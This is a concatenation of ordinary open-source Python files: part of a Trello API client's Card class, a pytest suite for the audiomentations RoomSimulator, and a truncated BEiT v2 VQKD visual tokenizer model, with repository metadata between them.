card.dateLastActivity = dateparser.parse(json_obj['dateLastActivity'])
if "attachments" in json_obj:
card._attachments = []
for attachment_json in json_obj["attachments"]:
card._attachments.append(attachment_json)
if 'actions' in json_obj:
card.actions = json_obj['actions']
return card
def __repr__(self):
return force_str(u'<Card %s>' % self.name)
def fetch(self, eager=True):
"""
Fetch all attributes for this card
:param eager: If eager, comments, checklists and attachments will be fetched immediately, otherwise on demand
"""
json_obj = self.client.fetch_json(
'/cards/' + self.id,
query_params={'badges': False, 'customFieldItems': 'true'})
self.id = json_obj['id']
self.name = json_obj['name']
self.desc = json_obj.get('desc', '')
self.closed = json_obj['closed']
self.url = json_obj['url']
self.shortUrl = json_obj['shortUrl']
self.idMembers = json_obj['idMembers']
self.idShort = json_obj['idShort']
self.idList = json_obj['idList']
self.idBoard = json_obj['idBoard']
self.idLabels = json_obj['idLabels']
self._labels = Label.from_json_list(self.board, json_obj['labels'])
self.badges = json_obj['badges']
self.pos = json_obj['pos']
if json_obj.get('due', ''):
self.due = json_obj.get('due', '')
else:
self.due = ''
self.dateLastActivity = dateparser.parse(json_obj['dateLastActivity'])
self._customFields = self.fetch_custom_fields(json_obj=json_obj)
self._plugin_data = self.fetch_plugin_data() if eager else None
self._checklists = self.fetch_checklists() if eager else None
self._comments = self.fetch_comments() if eager else None
self._attachments = self.fetch_attachments() if eager else None
def fetch_custom_fields(self, json_obj=None):
"""
Fetch current set of custom fields from card or json_obj.
"""
if json_obj is None:
json_obj = self.client.fetch_json(
'/cards/' + self.id,
query_params={'badges': False, 'customFieldItems': 'true'})
return CustomField.from_json_list(
self, json_obj.get('customFieldItems', {}))
def fetch_comments(self, force=False, limit=None):
comments = []
if (force is True) or (self.badges['comments'] > 0):
query_params = {'filter': 'commentCard,copyCommentCard'}
if limit is not None:
query_params['limit'] = limit
comments = self.client.fetch_json(
'/cards/' + self.id + '/actions',
query_params=query_params)
return sorted(comments, key=lambda comment: comment['date'])
return comments
def get_list(self):
obj = self.client.fetch_json('/lists/' + self.idList)
return List.from_json(board=self, json_obj=obj)
def get_comments(self):
"""Alias for fetch_comments for backward compatibility.
Always contact server
"""
return self.fetch_comments(force=True)
def fetch_checklists(self):
if self.countCheckLists == 0:
return []
checklists = []
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/checklists', )
# Thanks https://github.com/HuffAndPuff for noticing checklist
# were not sorted
json_obj = sorted(json_obj, key=lambda checklist: checklist['pos'])
for cl in json_obj:
checklists.append(Checklist(self.client, cl,
trello_card=self.id))
return checklists
def fetch_plugin_data(self):
items = self.client.fetch_json(
'/cards/' + self.id + '/pluginData')
return items
def fetch_attachments(self, force=False):
if (force is True) or (self.badges['attachments'] > 0):
items = self.client.fetch_json(
'/cards/' + self.id + '/attachments',
query_params={'filter':'false'})
return items
return []
def get_attachments(self):
return [Attachments.from_json(attachments_json) for attachments_json in self.fetch_attachments(force=True)]
def fetch_actions(self, action_filter='createCard', since=None, before=None, action_limit=50):
"""
Fetch actions for this card can give more argv to action_filter,
split for ',' json_obj is list
"""
query_params={'filter': action_filter, 'limit': action_limit}
if since:
query_params["since"] = since
if before:
query_params["before"] = before
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/actions',
query_params=query_params)
self.actions = json_obj
return self.actions
def attriExp(self, multiple):
"""
Provides the option to explore what comes from trello
:multiple is one of the attributes of GET /1/cards/[card id or shortlink]/actions
"""
self.fetch_actions(multiple)
return self.actions
@staticmethod
def _movement_as_triplet(source_list, destination_list, movement_datetime):
return [source_list["name"], destination_list["name"], movement_datetime]
@staticmethod
def _movement_as_dict(source_list, destination_list, movement_datetime):
_movement = {
"source": source_list,
"destination": destination_list,
"datetime": movement_datetime,
}
return _movement
def _list_movements(self, movement_function, filter_by_date_interval=None):
"""
Returns the list of movements of this card.
The list of movements is in descending date and time order. First movement is the closest one to now.
Its structure is a list of dicts where the lists are "source" and "destination" and both are also dicts.
Date and time of the movement is in key "datetime" as a datetime object.
:param movement_function: function that returns a representation of the movement.
:param filter_by_date_interval: Date interval used to filter card movements to return. Optional
:return: list with the movements.
"""
action_since = None if not filter_by_date_interval else filter_by_date_interval[0]
action_before = None if not filter_by_date_interval else filter_by_date_interval[1]
if not hasattr(self, "actions") or self.actions is None:
self.fetch_actions('updateCard:idList,', action_since, action_before)
movements = []
for idx in self.actions:
date_str = idx['date']
movement_datetime = dateparser.parse(date_str)
try:
source_list = idx['data']['listBefore']
destination_list = idx['data']['listAfter']
except KeyError:
continue
movement = movement_function(source_list, destination_list, movement_datetime)
movements.append(movement)
return movements
def listCardMove_date(self):
"""Will return the history of transitions of a card from one list to
another. The lower the index the more recent the historical item.
It returns a list of lists. The sublists are triplets of
starting list, ending list and when the transition occurred.
"""
return self._list_movements(movement_function=Card._movement_as_triplet)
def list_movements(self, list_cmp=None, filter_by_date_interval=None):
"""Will return the history of transitions of a card from one list to
another. The lower the index the more recent the historical item.
It returns a list of dicts in date and time descending order (the
first movement is the most recent).
Dicts are of the form source:
<listobj> destination: <listobj> datetime: <datetimeobj>
:param: list_cmp Comparison function between lists. For list_cmp(a, b) returns -1 if list a is greater that list b. Returns 1 otherwise.
:param: filter_by_date_interval: pair of two dates (two strings in YYYY-MM-DD format) to filter card movements by date.
"""
movement_as_dict_function = Card._movement_as_dict
if list_cmp:
def movement_as_dict_function(_source_list, _destination_list, _movement_datetime):
_movement = Card._movement_as_dict(_source_list, _destination_list, _movement_datetime)
_source_list_id = _source_list["id"]
_destination_list_id = _destination_list["id"]
_movement["moving_forward"] = list_cmp(_source_list_id, _destination_list_id) > 0
return _movement
return self._list_movements(movement_function=movement_as_dict_function, filter_by_date_interval=filter_by_date_interval)
def get_stats_by_list(self, lists, list_cmp=None, done_list=None, time_unit="seconds", card_movements_filter=None):
"""Gets several stats about the card by each list of the board:
- time: The time that the card has been in each column in seconds (minutes or hours).
- forward_moves: How many times this card has been the source of a forward movement.
- backward_moves: How many times this card has been the source of a backward movement.
Returns a dict where the key is list id and value is a dict with keys
time, forward_moves and backward_moves.
:param lists: list of board lists.
:param list_cmp: function that compares two lists a,b given id_a, id_b. If b is in a forward position returns 1 else -1.
:param time_unit: default to seconds. Allow specifying time in "minutes" or "hours".
:param done_list: Column that implies that the task is done. If present, time measurement will be stopped if is current task list.
:param card_movements_filter: Pair of two dates (two strings in YYYY-MM-DD format) that will filter the movements of the card. Optional.
:return: dict of the form {list_id: {time:<time card was in that list>, forward_moves: <number>, backward_moves: <number> }}
"""
tz = pytz.timezone(Organization.TIMEZONE)
# Conversion of units
seconds_to_time_unit = lambda time: time
if time_unit == "minutes":
seconds_to_time_unit = lambda time: time / 60.0
elif time_unit == "hours":
seconds_to_time_unit = lambda time: time / 3660.0
# Creation datetime of the card
creation_datetime = self.created_date
# Time in seconds stores the seconds that our card lives in a column
stats_by_list = {list_.id: {"time":0, "forward_moves":0, "backward_moves":0} for list_ in lists}
# Last action date, used to compute the time the card spends between changes
# of columns
last_action_datetime = creation_datetime
# Changes of columns of our card
# Using list comparison function (if present) to check list position and, hence,
# if the card movement was forward or backwards
changes = self.list_movements(list_cmp, card_movements_filter)
# If there are no changes in the card, all its life has been in its creation list
if len(changes) == 0:
card_life_time = seconds_to_time_unit((datetime.datetime.now(tz) - last_action_datetime).total_seconds())
stats_by_list[self.idList]["time"] += card_life_time
else:
# Changes in card are ordered to get the dates in order
last_list = None
ordered_changes = sorted(changes, key=itemgetter("datetime"))
# For each arrival to a list, its datetime will be used to compute
# the time this card is in that destination list
for change in ordered_changes:
source_list = change["source"]
destination_list = change["destination"]
change_datetime = change["datetime"]
# For each column the total number of seconds this card is computed
source_list_id = source_list["id"]
time_from_last_list_change = seconds_to_time_unit((change_datetime - last_action_datetime).total_seconds())
# Our last action has been this change
last_action_datetime = change_datetime
# In case the source or destination list is not a list of this board, ignore them
if source_list_id not in stats_by_list:
continue
stats_by_list[source_list_id]["time"] += time_from_last_list_change
# Count if the change is to move forward or backwards
if "moving_forward" in change:
if change["moving_forward"]:
stats_by_list[source_list_id]["forward_moves"] += 1
else:
stats_by_list[source_list_id]["backward_moves"] += 1
# Store the last list
last_list = destination_list
# Adding the number of seconds the card has been in its last column (until now)
# only if the last column is not "Done" column
if done_list and last_list and last_list["id"] and last_list["id"] in stats_by_list and\
last_list["id"] != done_list.id:
time_card_has_spent_in_list_until_now = seconds_to_time_unit((datetime.datetime.now(tz) - last_action_datetime).total_seconds())
stats_by_list[last_list["id"]]["time"] += time_card_has_spent_in_list_until_now
return stats_by_list
@property
def latestCardMove_date(self):
"""Returns the date of the last card transition"""
self.fetch_actions('updateCard:idList')
if self.actions is None or len(self.actions) == 0:
return None
date_str = self.actions[0]['date']
return dateparser.parse(date_str)
@property
def created_date(self):
"""Will return the creation date of the card.
WARNING: if the card was create via convertion of a checklist item
it fails. attriExp('convertToCardFromCheckItem') allows to
test for the condition.
"""
if not hasattr(self, "creation_date"):
localtz = pytz.timezone(Organization.TIMEZONE)
self.creation_date = localtz.localize(datetime.datetime.fromtimestamp(int(self.id[0: 8], 16)))
return self.creation_date
@property
def card_created_date(self):
"""Will return the creation date of the card.
NOTE: This will return the date the card was created, even if it
was created on another board. The created_date() above actually just
returns the first activity and has the issue described in the warning.
The first 8 characters of the card id is a hexadecimal number.
Converted to a decimal from hexadecimal, the timestamp is an Unix
timestamp (the number of seconds that have elapsed since January 1,
1970 midnight UTC. See
http://help.trello.com/article/759-getting-the-time-a-card-or-board-was-created
"""
unix_time = int(self.id[:8], 16)
return datetime.datetime.fromtimestamp(unix_time)
@property
def due_date(self):
return dateparser.parse(self.due) if self.due else ''
def set_name(self, new_name):
"""Update the name on the card to :new_name:
:new_name: str
"""
self._set_remote_attribute('name', new_name)
self.name = new_name
def set_description(self, description):
self._set_remote_attribute('desc', description)
self.desc = description
def set_due(self, due):
"""Set the due time for the card
:due: a datetime object
"""
datestr = due.isoformat()
self._set_remote_attribute('due', datestr)
self.due = datestr
def set_start(self, start):
"""Set the start time for the card
:start: a datetime object
"""
datestr = start.isoformat()
self._set_remote_attribute('start', datestr)
self.start = datestr
def set_reminder(self, reminder):
"""Set a reminder time for the card
:reminder: total number of minutes before the due date as an int
"""
# datestr = reminder.isoformat()
if isinstance(reminder,(float,str)):
reminder = int(float(reminder))
self._set_remote_attribute('dueReminder', reminder)
self.reminder = reminder
def set_due_complete(self):
"""Set due complete
:return: None
"""
self._set_due_complete(True)
def remove_due_complete(self):
"""Remove due complete
:return: None
"""
self._set_due_complete(False)
def remove_due(self):
"""
Remove the due datetime of this card.
"""
self._set_remote_attribute('due', None)
self.due = ''
def set_pos(self, pos):
"""
Update card position in list
:pos: 'top', 'bottom' or int
"""
self._set_remote_attribute('pos', pos)
self.pos = pos
def set_custom_field(self, value, custom_field):
"""Update card custom field
Arguments:
value {[str, int, date, bool]} -- Value depending on the type of custom_field
custom_field {custom field object} -- Custom Field Object (board.get_custom_field_definitions()[0])
"""
if custom_field.field_type in ['text', 'number', 'date', 'checked']:
if value == "":
post_args = {'value': ""}
else:
post_args = {'value': {str(custom_field.field_type): value}}
else:
if value == "":
list_field_id = ""
else:
list_field_id = [
x for x, y in custom_field.list_options.items() if y == value][0]
post_args = {'idValue': list_field_id}
self.client.fetch_json(
'/card/' + self.id + '/customField/' + custom_field.id + '/item',
http_method='PUT',
post_args=post_args)
def set_closed(self, closed):
self._set_remote_attribute('closed', closed)
self.closed = closed
def delete_comment(self, comment):
# Delete this comment permanently
self.client.fetch_json(
'/cards/' + self.id + '/actions/' + comment['id'] + '/comments',
http_method='DELETE')
def delete(self):
# Delete this card permanently
self.client.fetch_json(
'/cards/' + self.id,
http_method='DELETE')
def assign(self, member_id):
self.client.fetch_json(
'/cards/' + self.id + '/members',
http_method='POST',
post_args={'value': member_id})
def unassign(self, member_id):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers/' + member_id,
http_method='DELETE')
def subscribe(self):
self.client.fetch_json(
'/cards/' + self.id + '/subscribed',
http_method='PUT',
post_args={'value': True})
def comment(self, comment_text):
"""Add a comment to a card.
:comment_text: str
"""
comment_data = self.client.fetch_json(
'/cards/' + self.id + '/actions/comments',
http_method='POST',
post_args={'text': comment_text})
return comment_data
def update_comment(self, comment_id, comment_text):
"""Update a comment."""
comment_data = self.client.fetch_json(
'/actions/' + comment_id,
http_method='PUT',
post_args={'text': comment_text}
)
return comment_data
def add_label(self, label):
self.client.fetch_json(
'/cards/' + self.id + '/idLabels',
http_method='POST',
post_args={'value': label.id})
def create_label(self, name, color):
self.client.fetch_json(
"/cards/" + self.id + "/labels",
http_method='POST',
post_args={"name": name, "color": color})
def remove_label(self, label):
self.client.fetch_json(
'/cards/' + self.id + '/idLabels/' + label.id,
http_method='DELETE')
def add_member(self, member):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers',
http_method='POST',
post_args={'value': member.id})
def remove_member(self, member):
self.client.fetch_json(
'/cards/' + self.id + '/idMembers/' + member.id,
http_method='DELETE')
def attach(self, name=None, mimeType=None, file=None, url=None, setCover=None):
"""
Add an attachment to the card. The attachment can be either a
file or a url. Setting the name and/or mime type is optional.
:param name: The name of the attachment
:param mimeType: mime type for the attachement
:param file: a file-like, binary object that supports read()
:param url: a URL pointing to the resource to be attached
:param cover: boolean
"""
if (file and url) or (not file and not url):
raise Exception('Please provide either a file or url, and not both!')
kwargs = {}
if file:
kwargs['files'] = dict(file=(name, file, mimeType))
else:
kwargs['name'] = name
kwargs['mimeType'] = mimeType
kwargs['url'] = url
kwargs['setCover'] = setCover
return self._post_remote_data('attachments', **kwargs)
def remove_attachment(self, attachment_id):
"""
Remove attachment from card
:param attachment_id: Attachment id
:return: None
"""
self.client.fetch_json(
'/cards/' + self.id + '/attachments/' + attachment_id,
http_method='DELETE')
def change_pos(self, position):
self.client.fetch_json(
'/cards/' + self.id + '/pos',
http_method='PUT',
post_args={'value': position})
def change_list(self, list_id):
self.client.fetch_json(
'/cards/' + self.id + '/idList',
http_method='PUT',
post_args={'value': list_id})
def change_board(self, board_id, list_id=None):
args = {'value': board_id}
if list_id is not None:
args['idList'] = list_id
self.client.fetch_json(
'/cards/' + self.id + '/idBoard',
http_method='PUT',
post_args=args)
def add_checklist(self, title, items, itemstates=None):
"""Add a checklist to this card
:title: title of the checklist
:items: a list of the item names
:itemstates: a list of the state (True/False) of each item
:return: the checklist
"""
if itemstates is None:
itemstates = []
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/checklists',
http_method='POST',
post_args={'name': title}, )
cl = Checklist(self.client, json_obj, trello_card=self.id)
for i, name in enumerate(items):
try:
checked = itemstates[i]
except IndexError:
checked = False
cl.add_checklist_item(name, checked)
self.fetch()
return cl
def _set_due_complete(self, is_complete):
"""Set due is complete or not complete
https://developers.trello.com/advanced-reference/card#put-1-cards-card-id-or-shortlink-dueComplete
:param is_complete: boolean
:return: None
"""
self.client.fetch_json('/cards/' + self.id + '/dueComplete',
http_method='PUT',
post_args={'value': is_complete})
def _set_remote_attribute(self, attribute, value):
self.client.fetch_json(
'/cards/' + self.id + '/' + attribute,
http_method='PUT',
post_args={'value': value}, )
def _post_remote_data(self, attribute, files=None, **kwargs):
return self.client.fetch_json(
'/cards/' + self.id + '/' + attribute,
http_method='POST',
files=files,
post_args=kwargs)
def get_custom_field_by_name(self, cf_name):
"""
Returns existing custom field by name or creates a new one.
"""
for cf in self.customFields:
if cf.name == cf_name:
return cf
cf_class = None
cf_def_id = None
for definition in self.board.get_custom_field_definitions():
if definition.name == cf_name:
cf_def_id = definition.id
cf_class = {
'checkbox': CustomFieldCheckbox,
'date': CustomFieldDate,
'list': CustomFieldList,
'number': CustomFieldNumber,
'text': CustomFieldText,
}.get(definition.field_type)
if cf_class is None:
raise ValueError('Unknown custom field name specified ({})'.format(cf_name))
return cf_class(self, 'unknown', cf_def_id, '')
from trello.trellolist import List
|
9049e49b48b8779003e24e996bfa1ddae0a9ee9f
|
1e148aada79cb648872bb8ecc740a6a798b2e236
|
/tests/test_room_simulator.py
|
f29d23bc212c104b0e1cc36e3b91cf6595486f63
|
[
"MIT"
] |
permissive
|
iver56/audiomentations
|
a40ae457ca03ab8c927ad804f489cef783dae8d4
|
498a7d4f149d8917813aa35ff18e748cff49cd09
|
refs/heads/main
| 2023-09-05T05:53:05.369792
| 2023-08-30T13:12:51
| 2023-08-30T13:12:51
| 170,352,817
| 1,520
| 182
|
MIT
| 2023-09-07T14:35:26
| 2019-02-12T16:36:24
|
Python
|
UTF-8
|
Python
| false
| false
| 5,015
|
py
|
test_room_simulator.py
|
import random
import numpy as np
import pytest
from audiomentations import RoomSimulator
DEBUG = False
def get_sinc_impulse(sample_rate, duration):
"""Create a `duration` seconds chirp from 0Hz to `nyquist frequency`"""
n = np.arange(-duration / 2, duration / 2, 1 / sample_rate)
# Full band sinc impulse centered at half the duration
samples = 2 * 0.25 * np.sinc(2 * sample_rate / 4 * n)
return samples.astype(np.float32)
class TestRoomSimulatorTransform:
def test_simulate_apply_parity(self):
"""
Tests whether RoomSimulator.apply gives the same result as Roomsimulator.room.simulate() in the 1D case.
This mainly tests that we took into consideration and compensated about the delays introduced when pyroomacoustics
computes the room impulse response.
See:[Create the Room Impulse Response](https://pyroomacoustics.readthedocs.io/en/pypi-release/pyroomacoustics.room.html?highlight=simulate#)
"""
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator()
augmented_samples_apply = augment(samples=samples, sample_rate=sample_rate)
augment.room.simulate()
augmented_samples_simulate = augment.room.mic_array.signals.astype(
np.float32
).flatten()
assert np.all(augmented_samples_apply == augmented_samples_simulate)
def test_failing_case(self):
"""Failed case which identified a bug where the room created was not rectangular"""
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
min_size_x=3.0,
min_size_y=4.0,
min_size_z=3.0,
max_size_x=3.0,
max_size_y=4.0,
max_size_z=3.0,
min_source_x=0.5,
min_source_y=0.5,
min_source_z=1.8,
max_source_x=0.5,
max_source_y=0.5,
max_source_z=1.8,
min_mic_distance=0.1,
max_mic_distance=0.1,
p=1.0,
)
augment(samples=samples, sample_rate=sample_rate)
@pytest.mark.parametrize("num_channels", [1, 2, 3])
def test_multichannel_input(self, num_channels):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
n_channels = np.tile(samples, (num_channels, 1))
augment = RoomSimulator(leave_length_unchanged=True)
# Setting the seed is important for reproduction
np.random.seed(1)
augmented_samples = augment(samples=samples, sample_rate=sample_rate)
assert augmented_samples.shape == samples.shape
augment.freeze_parameters()
np.random.seed(1)
augmented_n_channels = augment(samples=n_channels, sample_rate=sample_rate)
assert augmented_n_channels.shape == n_channels.shape
assert np.allclose(augmented_samples, augmented_n_channels[0])
@pytest.mark.parametrize("leave_length_unchanged", [True, False])
def test_input_with_absorption(self, leave_length_unchanged):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
p=1.0,
leave_length_unchanged=leave_length_unchanged,
)
processed_samples = augment(samples=samples, sample_rate=sample_rate)
# Store a measured rt60 parameter
theoretical_rt60 = augment.room.rt60_theory()
measured_rt60 = augment.room.measure_rt60()[0][0]
# Experimentally set that in this case
assert np.isclose(theoretical_rt60, measured_rt60, atol=0.065)
assert processed_samples.dtype == samples.dtype
assert not np.allclose(processed_samples[: len(samples)], samples)
assert len(processed_samples.shape) == 1
@pytest.mark.parametrize("leave_length_unchanged", [True, False])
def test_input_with_rt60(self, leave_length_unchanged):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
p=1.0,
calculation_mode="rt60",
min_target_rt60=0.3,
max_target_rt60=0.3,
leave_length_unchanged=leave_length_unchanged,
)
processed_samples = augment(samples=samples, sample_rate=sample_rate)
# Store a measured rt60 parameter
theoretical_rt60 = augment.room.rt60_theory()
measured_rt60 = augment.room.measure_rt60()[0][0]
# Experimentally set that in this case. Target t60
# is expected to deviate quite a bit.
assert np.isclose(0.3, theoretical_rt60, atol=0.05)
assert np.isclose(theoretical_rt60, measured_rt60, atol=0.065)
assert processed_samples.dtype == samples.dtype
assert not np.allclose(processed_samples[: len(samples)], samples)
assert len(processed_samples.shape) == 1
|
1bc1e6f085affc491c552612789650d727ed23f1
|
fb1e852da0a026fb59c8cb24aeb40e62005501f1
|
/beit2/modeling_vqkd.py
|
8cd8be7725ba11c34a8a241e83b3de650dbb983a
|
[
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"MIT"
] |
permissive
|
microsoft/unilm
|
134aa44867c5ed36222220d3f4fd9616d02db573
|
b60c741f746877293bb85eed6806736fc8fa0ffd
|
refs/heads/master
| 2023-08-31T04:09:05.779071
| 2023-08-29T14:07:57
| 2023-08-29T14:07:57
| 198,350,484
| 15,313
| 2,192
|
MIT
| 2023-08-19T11:33:20
| 2019-07-23T04:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 15,070
|
py
|
modeling_vqkd.py
|
# --------------------------------------------------------
# BEiT v2: Masked Image Modeling with Vector-Quantized Visual Tokenizers (https://arxiv.org/abs/2208.06366)
# Github source: https://github.com/microsoft/unilm/tree/master/beitv2
# Copyright (c) 2022 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# By Zhiliang Peng
# Based on VQGAN code bases
# https://github.com/CompVis/taming-transformers
# --------------------------------------------------------'
import torch
import numpy as np
from torch import nn, einsum
import torch.nn.functional as F
import math
from collections import OrderedDict
from functools import partial, reduce
from einops import rearrange
from timm.models.layers import trunc_normal_
from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.registry import register_model
from modeling_finetune import VisionTransformer
from norm_ema_quantizer import NormEMAVectorQuantizer
import utils
from vqkd_teacher import clip, get_dino_vit_base
class VQKD(nn.Module):
def __init__(self,
encoder_config,
decoder_config,
n_embed=8192,
embed_dim=32,
decay=0.99,
process_type='default',
quantize_kmeans_init=True,
teacher_model_type='clip',
decoder_out_dim=512,
rec_loss_type='cosine',
**kwargs
):
super().__init__()
print(kwargs)
if decoder_config['in_chans'] != embed_dim:
print(f"Rewrite the in_chans in decoder from {decoder_config['in_chans']} to {embed_dim}")
decoder_config['in_chans'] = embed_dim
# encoder & decode params
print('Final encoder config', encoder_config)
self.encoder = VisionTransformer(**encoder_config)
print('Final decoder config', decoder_config)
self.decoder = VisionTransformer(**decoder_config)
self.quantize = NormEMAVectorQuantizer(
n_embed=n_embed, embedding_dim=embed_dim, beta=1.0, kmeans_init=quantize_kmeans_init, decay=decay,
)
self.patch_size = encoder_config['patch_size']
self.token_shape = (encoder_config['img_size'] // self.patch_size, encoder_config['img_size'] // self.patch_size)
## Teacher model setting
self.teacher_model_type = teacher_model_type
self.decoder_out_dim = decoder_out_dim
if self.teacher_model_type == 'clip':
self.scaling_layer = ScalingLayerForClip()
self.teacher_model, _ = clip.load("ViT-B/16", device='cpu', jit=False)
self.decoder_out_dim = 512
elif self.teacher_model_type == 'dino':
self.scaling_layer = ScalingLayerForIM()
self.teacher_model = get_dino_vit_base()
self.decoder_out_dim = 768
else:
self.teacher_model = None
if self.teacher_model is not None:
for param in self.teacher_model.parameters():
param.requires_grad = False # fix teacher_model model
self.teacher_model.eval()
self.teacher_input_size = kwargs.get('teacher_input_size', 224)
# task layer
self.encode_task_layer = nn.Sequential(
nn.Linear(encoder_config['embed_dim'], encoder_config['embed_dim']),
nn.Tanh(),
nn.Linear(encoder_config['embed_dim'], embed_dim) # for quantize
)
self.decode_task_layer = nn.Sequential(
nn.Linear(decoder_config['embed_dim'], decoder_config['embed_dim']),
nn.Tanh(),
nn.Linear(decoder_config['embed_dim'], self.decoder_out_dim),
)
self.rec_loss_type = rec_loss_type
print(f"process type for VQKD: {process_type}")
self.process_type = process_type # in ['default', 'dall-e']
self.logit_laplace_eps = 0.1
self.kwargs = kwargs
self.encode_task_layer.apply(self._init_weights)
self.decode_task_layer.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'quantize.embedding.weight', 'decoder.cls_token', 'decoder.pos_embed',
'encoder.cls_token', 'encoder.pos_embed'}
@property
def device(self):
return self.decoder.cls_token.device
def pre_process(self, data):
if self.process_type == 'default':
# TODO: modify for adapt
data = data.to(self.device)
if data.max() <= 1.:
data = data * 255.
data = data / 127.5 - 1.0
elif self.process_type == 'imagenet_norm':
mean = torch.as_tensor(IMAGENET_DEFAULT_MEAN).to(self.device)[None, :, None, None]
std = torch.as_tensor(IMAGENET_DEFAULT_STD).to(self.device)[None, :, None, None]
data = (data - mean) / std
return data
def get_number_of_tokens(self):
return self.quantize.n_e
def get_tokens(self, data, **kwargs):
data = self.pre_process(data)
quantize, embed_ind, loss = self.encode(data)
output = {}
output['token'] = embed_ind.view(data.shape[0], -1)
output['input_img'] = data
return output
def encode(self, x):
encoder_features = self.encoder(x, return_patch_tokens=True)
with torch.cuda.amp.autocast(enabled=False):
to_quantizer_features = self.encode_task_layer(encoder_features.type_as(self.encode_task_layer[-1].weight))
N = to_quantizer_features.shape[1]
h, w = int(math.sqrt(N)), int(math.sqrt(N))
to_quantizer_features = rearrange(to_quantizer_features, 'b (h w) c -> b c h w', h=h, w=w) # reshape for quantizer
quantize, loss, embed_ind = self.quantize(to_quantizer_features)
return quantize, embed_ind, loss
def decode(self, quantize, **kwargs):
# reshape tokens to feature maps for patch embed in decoder
# quantize = rearrange(quantize, 'b (h w) c -> b c h w', h=self.token_shape[0], w=self.token_shape[1])
decoder_features = self.decoder(quantize, return_patch_tokens=True)
rec = self.decode_task_layer(decoder_features)
return rec
def get_codebook_indices(self, x, **kwargs):
# for beit pre-training
return self.get_tokens(x, **kwargs)['token']
@torch.no_grad()
def get_regress_target(self, x, **kwargs):
norm_imgs = self.scaling_layer(x)
if self.teacher_model_type == 'clip':
target = self.teacher_model.encode_image(norm_imgs, return_all_tokens=True) @ self.teacher_model.visual.proj
elif self.teacher_model_type == 'dino':
target = self.teacher_model.forward(norm_imgs, return_patch_tokens=True)
else:
raise NotImplementedError
return target
def calculate_rec_loss(self, rec, target):
if self.rec_loss_type == 'cosine':
target = target / target.norm(dim=-1, keepdim=True)
rec = rec / rec.norm(dim=-1, keepdim=True)
rec_loss = (1 - (target * rec).sum(-1)).mean()
else:
raise NotImplementedError
return rec_loss
def forward(self, x, **kwargs):
"""
x: shape [B, 3, H, W] in [0, 1]
"""
x = self.pre_process(x) # rescale to [-1, 1]
target = self.get_regress_target(x, **kwargs)
quantize, embed_ind, emb_loss = self.encode(x)
xrec = self.decode(quantize)
rec_loss = self.calculate_rec_loss(xrec, target)
loss = emb_loss + rec_loss
log = {}
split="train" if self.training else "val"
log[f'{split}/quant_loss'] = emb_loss.detach().mean()
log[f'{split}/rec_loss'] = rec_loss.detach().mean()
log[f'{split}/total_loss'] = loss.detach().mean()
return loss, log
class ScalingLayerForClip(nn.Module):
def __init__(self):
super(ScalingLayerForClip, self).__init__()
self.register_buffer('shift', torch.Tensor([0.48145466, 0.4578275, 0.40821073])[None, :, None, None])
self.register_buffer('scale', torch.Tensor([0.26862954, 0.26130258, 0.27577711])[None, :, None, None])
def forward(self, inp):
inp = ((inp + 1.) * 127.5).clamp(0, 255.) / 255. # rescale to [0, 1.]
return (inp - self.shift) / self.scale
class ScalingLayerForIM(nn.Module):
def __init__(self):
super(ScalingLayerForIM, self).__init__()
self.register_buffer('shift', torch.Tensor([0.485, 0.456, 0.406])[None, :, None, None]) # scale for tokenizer with default prosscess type \in [-1, 1]
self.register_buffer('scale', torch.Tensor([0.229, 0.224, 0.225])[None, :, None, None])
def forward(self, inp):
inp = ((inp + 1.) * 127.5).clamp(0, 255.) / 255. # rescale to [0, 1.]
return (inp - self.shift) / self.scale
def get_model_default_params():
return dict(img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12,
mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.,
norm_layer=partial(nn.LayerNorm, eps=1e-6), init_values=0., use_abs_pos_emb=True,
use_rel_pos_bias=False, use_shared_rel_pos_bias=False, use_mean_pooling=True, init_scale=0.001)
@register_model
def vqkd_encoder_base_decoder_1x768x12_clip(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 1
# teacher settings
_ = kwargs.pop("teacher_model_type", "clip")
teacher_model_type = 'clip' if not as_tokenzer else 'None'
decoder_out_dim = 512
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
